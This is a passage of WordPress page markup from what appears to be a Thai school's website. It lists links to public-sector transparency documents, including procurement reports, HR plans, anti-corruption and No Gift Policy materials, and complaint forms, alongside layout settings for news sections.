</a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" 